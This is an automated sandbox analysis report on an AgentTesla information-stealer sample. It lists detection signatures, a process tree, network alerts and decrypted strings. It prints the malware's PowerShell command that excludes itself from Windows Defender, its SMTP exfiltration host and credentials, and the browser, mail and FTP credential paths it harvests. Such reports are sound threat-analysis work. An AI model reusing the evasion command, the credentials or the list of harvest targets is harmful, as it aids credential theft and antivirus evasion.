Edit tour

Windows Analysis Report
Quote_8714.exe

Overview

General Information

Sample name:	Quote_8714.exe
Analysis ID:	1571202
MD5:	aab6786b56cd4bebf107aa1f00d680c4
SHA1:	785459ff067ac23f52789e7d0b36084186864dcb
SHA256:	e834cc0db159080a88d07c5e1c843905f7eb1f3b0b48ad1c5377f159fcb5e5f0
Tags:	exeuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Quote_8714.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\Quote_8714.exe" MD5: AAB6786B56CD4BEBF107AA1F00D680C4)

powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Quote_8714.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Quote_8714.exe" MD5: AAB6786B56CD4BEBF107AA1F00D680C4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Quote_8714.exe PID: 4464	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Quote_8714.exe PID: 7392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quote_8714.exe PID: 7392	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.Quote_8714.exe.3a82990.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quote_8714.exe.3a59970.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Quote_8714.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quote_8714.exe.3a82990.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quote_8714.exe.3a59970.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_8714.exe", ParentImage: C:\Users\user\Desktop\Quote_8714.exe, ParentProcessId: 4464, ParentProcessName: Quote_8714.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", ProcessId: 2504, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_8714.exe, Initiated: true, ProcessId: 7392, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_8714.exe", ParentImage: C:\Users\user\Desktop\Quote_8714.exe, ParentProcessId: 4464, ParentProcessName: Quote_8714.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", ProcessId: 2504, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T06:53:52.010600+0100	2030171	1	A Network Trojan was detected	192.168.2.4	49735	199.79.62.115	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T06:52:18.315528+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49735	199.79.62.115	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T06:52:18.315528+0100	2855245	1	A Network Trojan was detected	192.168.2.4	49735	199.79.62.115	587	TCP

ETPRO MALWARE Win32/Agent Tesla SMTP Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T06:53:52.010600+0100	2839723	1	Malware Command and Control Activity Detected	192.168.2.4	49735	199.79.62.115	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T06:53:52.010600+0100	2840032	1	A Network Trojan was detected	192.168.2.4	49735	199.79.62.115	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}

Multi AV Scanner detection for submitted file

Source: Quote_8714.exe	ReversingLabs: Detection: 36%
Source: Quote_8714.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Quote_8714.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: /log.tmp
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>[
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ]<br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Time:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IP Address:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <hr>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: New
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IP Address:
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: mail.mbarieservicesltd.com
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: saless@mbarieservicesltd.com
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: *o9H+18Q4%;M
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: iinfo@mbarieservicesltd.com
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: false
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: appdata
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: KTvkzEc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: KTvkzEc.exe
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: KTvkzEc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Type
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <hr>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <b>[
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ]</b> (
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: )<br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {BACK}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {TAB}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {ESC}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {Win}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {DEL}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {END}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {HOME}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {Insert}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {NumLock}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {PageDown}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {PageUp}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {ENTER}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F1}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F2}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F3}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F4}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F5}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F6}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F7}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F8}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F9}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F10}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F11}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {F12}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: control
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {CTRL}
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: &
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: >
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: "
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <hr>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: logins
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IE/Edge
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Web Credentials
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SchemaId
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pResourceElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pPackageSid
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IE/Edge
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UC Browser
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Login Data
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: journal
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: wow_logins
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <array>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <dict>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <string>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </string>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <string>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </string>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: <data>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: </data>
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: credential
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: QQ Browser
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Profile
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: entries
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: category
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: str3
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: str2
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: blob0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: password_value
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: IncrediMail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PopPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: PopPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SmtpServer
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: EmailAddress
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Eudora
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: current
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Settings
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Settings
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: profiles.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: profiles.ini
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: autofill
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ClawsMail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \clawsrc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \clawsrc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: passkey0
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \accountrc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: smtp_server
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: address
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: account
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Flock Browser
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: signons3.txt
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: DynDns
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: username=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: password=
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: global
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: accounts
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: account.
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: username
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: account.
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: name
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: password
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: APPDATA
Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack	String decryptor: \Psi\profiles
